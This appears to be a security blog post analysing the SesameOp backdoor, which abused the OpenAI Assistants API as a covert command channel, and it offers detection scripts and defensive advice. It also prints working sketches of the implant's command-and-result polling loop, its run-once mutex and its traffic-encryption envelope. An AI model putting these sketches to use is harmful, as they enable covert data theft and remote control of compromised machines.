
SesameOp Opens the Wrong Door on the Children’s Show Set

  • Javier Conejo del Cerro
  • 3 days ago
  • 3 min read

Behind the cheerful façade of a colorful children’s TV set, a threat actor turned the stage lights toward something darker. Microsoft Incident Response (DART) uncovered a stealthy backdoor called SesameOp, designed to hide its malicious choreography inside trusted tools and innocent-looking network traffic.

Rather than using classic command-and-control servers, the operators abused the OpenAI Assistants API — turning a legitimate AI platform into a covert communication line. Hidden within compromised Visual Studio utilities, SesameOp fetched, decrypted, and executed encrypted commands while maintaining persistence for months. The puppets were dancing, but someone else was pulling the strings.


Phase 1 — The Backstage Infiltration 


Like stagehands slipping unnoticed behind the curtains, the attackers injected malicious libraries into Microsoft Visual Studio utilities via .NET AppDomainManager injection. This technique allowed the malware to load during legitimate development operations, running alongside trusted processes and avoiding immediate detection.
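
For defenders, the telltale artifact of this technique is a planted *.exe.config that points a trusted .NET binary at an attacker-controlled AppDomainManager. Below is a minimal triage sketch in Python, assuming the standard appDomainManagerAssembly and appDomainManagerType configuration elements the technique relies on (the scan root and output format are illustrative):

```python
import sys
from pathlib import Path

# AppDomainManager injection plants a *.exe.config beside a trusted .NET
# binary, pointing it at an attacker DLL via these runtime elements.
MARKERS = ("appdomainmanagerassembly", "appdomainmanagertype")

def scan(root: str) -> None:
    """Walk a directory tree and flag configs declaring an override."""
    for cfg in Path(root).rglob("*.exe.config"):
        try:
            text = cfg.read_text(errors="ignore").lower()
        except OSError:
            continue
        if any(marker in text for marker in MARKERS):
            print(f"[!] AppDomainManager override: {cfg}")

if __name__ == "__main__":
    scan(sys.argv[1] if len(sys.argv) > 1 else r"C:\Program Files")
```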

The compromise began on developer workstations and build servers — internal, high-trust environments rarely scrutinized for outbound API traffic. Once planted, the loader (Netapi64.dll) created markers and mutexes to ensure persistence and launched OpenAIAgent.Netapi64, the main component of the backdoor.
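
The markers and mutexes serve as a classic run-once guard: if a named object already exists, another copy of the implant is running and the new one stands down. A small Python illustration of that generic pattern on Windows follows; the mutex name is a placeholder, since Microsoft has not published SesameOp's actual strings:

```python
import ctypes
from ctypes import wintypes

ERROR_ALREADY_EXISTS = 183
kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
kernel32.CreateMutexW.restype = wintypes.HANDLE

def already_running(mutex_name: str) -> bool:
    """Create (or open) a named mutex; if it already existed, another
    instance is alive and this one should stand down."""
    kernel32.CreateMutexW(None, False, mutex_name)
    return ctypes.get_last_error() == ERROR_ALREADY_EXISTS

# "Netapi64" is a placeholder: Microsoft describes markers and mutexes
# as the loader's run-once guard but has not published the real names.
if already_running("Global\\Netapi64"):
    raise SystemExit("marker present, exiting")
```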

Its purpose: to maintain a covert presence inside enterprise networks and quietly prepare the stage for long-term espionage.


Phase 2 — Learning to Count (Stolen Files) 


With the curtains open, SesameOp began to act. The .NET-based backdoor connected to the OpenAI Assistants API, disguising its communications as legitimate AI-related requests. It queried vector stores and Assistant lists, hiding instructions and payloads within normal API interactions.

When it received a command, the backdoor decrypted and decompressed it, then executed scripts locally to enumerate files, capture screenshots, and extract information from browsers, including cookies, histories, credentials, and saved sessions.

Each result was encrypted again, Base64-encoded, and sent back to the same API, disguised as ordinary AI task responses.
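
Taken together, the loop has a simple shape: poll the API for a tagged object, unpack it, execute it, and push the output back through the same channel. Here is a sketch of that shape using the official openai Python SDK. The "SLEEP", "Payload", and "Result" tags come from Microsoft's write-up, but the carrier field, delimiter, and framing are illustrative guesses, and the AES/RSA layer described in Phase 4 is omitted for brevity:

```python
import base64
import gzip

from openai import OpenAI  # official openai SDK (1.x-style interface)

client = OpenAI()  # reads OPENAI_API_KEY from the environment

def fetch_command() -> bytes | None:
    """Poll the Assistants list for a tagged carrier object. Treating the
    description field as 'tag|base64(gzip(data))' is an assumption."""
    for assistant in client.beta.assistants.list(limit=100):
        desc = assistant.description or ""
        if desc.startswith("SLEEP"):
            return None  # operator told the implant to idle
        if desc.startswith("Payload|"):
            blob = desc.split("|", 1)[1]
            return gzip.decompress(base64.b64decode(blob))
    return None

def post_result(output: bytes) -> None:
    """Push results back through the same channel as a new,
    ordinary-looking assistant tagged 'Result'. Descriptions are capped
    at 512 characters, so real traffic would have to chunk larger data."""
    blob = base64.b64encode(gzip.compress(output)).decode()
    client.beta.assistants.create(model="gpt-4o", description=f"Result|{blob}")
```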

The data stolen included authentication tokens, system information, sensitive documents, and browser data — all valuable for further compromise or lateral movement. Within months, the puppet master had complete visibility of the affected environment.


Phase 3 — Opening the Wrong Door (Oops, Somebody Snuck In) 


The backdoor’s control mechanism was both creative and alarming. Instead of connecting to a known server or IP, SesameOp used OpenAI’s cloud infrastructure as its stage. Each instruction, labeled “SLEEP,” “Payload,” or “Result,” was stored inside legitimate OpenAI API objects — such as Assistants or vector stores — turning the platform into a neutral relay that hid malicious intent.

For defenders, this tactic blurred the line between normal AI usage and malicious traffic. Security tools saw HTTPS requests to api.openai.com — a fully trusted service — and marked them as benign.

By exploiting that blind trust, the attackers could coordinate actions, pull updates, and exfiltrate results while staying invisible among authentic API calls.
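
Domain reputation won't catch this, but timing can. Implant polling tends to be metronomic, while human and IDE traffic is bursty. Below is a rough beacon hunt over exported proxy logs, assuming a hypothetical CSV format with epoch, src, and host columns:

```python
import csv
from collections import defaultdict
from statistics import mean, pstdev

def beacon_candidates(log_path: str, host: str = "api.openai.com",
                      min_hits: int = 20):
    """Group requests per source, then flag sources whose inter-request
    gaps are nearly constant: low jitter at a steady interval is beacon
    behavior, not a developer's irregular, bursty usage."""
    times = defaultdict(list)
    with open(log_path, newline="") as f:
        for row in csv.DictReader(f):  # assumed columns: epoch, src, host
            if row["host"] == host:
                times[row["src"]].append(float(row["epoch"]))
    for src, ts in times.items():
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        if len(gaps) >= min_hits and pstdev(gaps) < 0.1 * mean(gaps):
            yield src, mean(gaps)

for src, interval in beacon_candidates("proxy.csv"):
    print(f"[!] {src} polls api.openai.com every ~{interval:.0f}s")
```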

This sophisticated abuse of legitimate infrastructure exemplifies the new reality of AI-integrated threats, in which trusted platforms become silent intermediaries for covert operations.


Phase 4 — Puppet Persistence 


SesameOp didn’t just appear and vanish. Its persistence mechanism — the combination of obfuscated DLLs, mutex control, and embedded configuration files — ensured the puppets kept performing long after the first act. The malware dynamically loaded modules through reflection and executed JScript code via the Microsoft JScript VsaEngine, granting it the flexibility to run any payload delivered through the API.

Its encryption scheme — dual-layered with AES and RSA keys, and additional GZIP compression — was designed for stealth and efficiency. Each communication cycle looked small, clean, and harmless to network sensors. This meticulous engineering highlights a strategic intent: not rapid destruction, but quiet, durable espionage.
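
That scheme is the standard hybrid envelope: compress the body, encrypt it with a fresh AES key, wrap the key with RSA, and Base64 the result so it survives transit as text. A sketch with the Python cryptography library follows; the GCM mode and the exact field layout are assumptions, since the report names the algorithms but not the framing:

```python
import base64
import gzip
import os

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

OAEP = padding.OAEP(mgf=padding.MGF1(hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

def seal(plaintext: bytes, rsa_pub) -> str:
    """GZIP-compress, AES-encrypt under a fresh key, RSA-wrap that key,
    then Base64 the whole envelope so it travels as plain text."""
    key, nonce = AESGCM.generate_key(bit_length=256), os.urandom(12)
    body = AESGCM(key).encrypt(nonce, gzip.compress(plaintext), None)
    wrapped = rsa_pub.encrypt(key, OAEP)
    return base64.b64encode(wrapped + nonce + body).decode()

def unseal(envelope: str, rsa_priv) -> bytes:
    """Reverse the envelope: unwrap the AES key, decrypt, decompress."""
    raw = base64.b64decode(envelope)
    wrapped, nonce, body = raw[:256], raw[256:268], raw[268:]  # 2048-bit RSA
    key = rsa_priv.decrypt(wrapped, OAEP)
    return gzip.decompress(AESGCM(key).decrypt(nonce, body, None))

# Round-trip demo with a throwaway key pair.
priv = rsa.generate_private_key(public_exponent=65537, key_size=2048)
assert unseal(seal(b"dir C:\\", priv.public_key()), priv) == b"dir C:\\"
```

Each cycle stays small: GZIP shrinks the payload, and only one RSA block of overhead rides along, which is exactly why the traffic looked clean to network sensors.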


Phase 5 — The Final Scene: Closing the Door 


Microsoft and OpenAI jointly investigated the incident, identifying and disabling the malicious API key and associated account. The account had made only limited API calls and had not interacted with models beyond the Assistants API, confirming that the threat was misuse of legitimate functionality, not a breach of OpenAI itself.

The broader lesson is clear: threat actors are adapting to the AI era, repurposing APIs, automation, and SaaS capabilities as covert infrastructure. Organizations can no longer rely solely on domain reputation or simple IP filtering.


Conclusions — Keeping the Puppets Off the Stage

 

To dismantle SesameOp-style operations and prevent future performances:

  • Audit developer environments and Visual Studio dependencies regularly for unusual DLL injections.

  • Monitor outbound API traffic — even to trusted cloud domains like OpenAI — for anomalies or abnormal frequency.

  • Restrict egress connections and enforce proxy policies to prevent unauthorized service use.

  • Enable tamper protection and run EDR/XDR in block mode to catch encrypted or obfuscated C2 activity.

  • Rotate keys and credentials frequently to reduce persistence opportunities.

  • Educate development teams about supply chain risks in build and packaging systems.


The show must go on — but with the right controls in place, only the good puppets will take the stage next time.



Source: Microsoft.


 
 
 
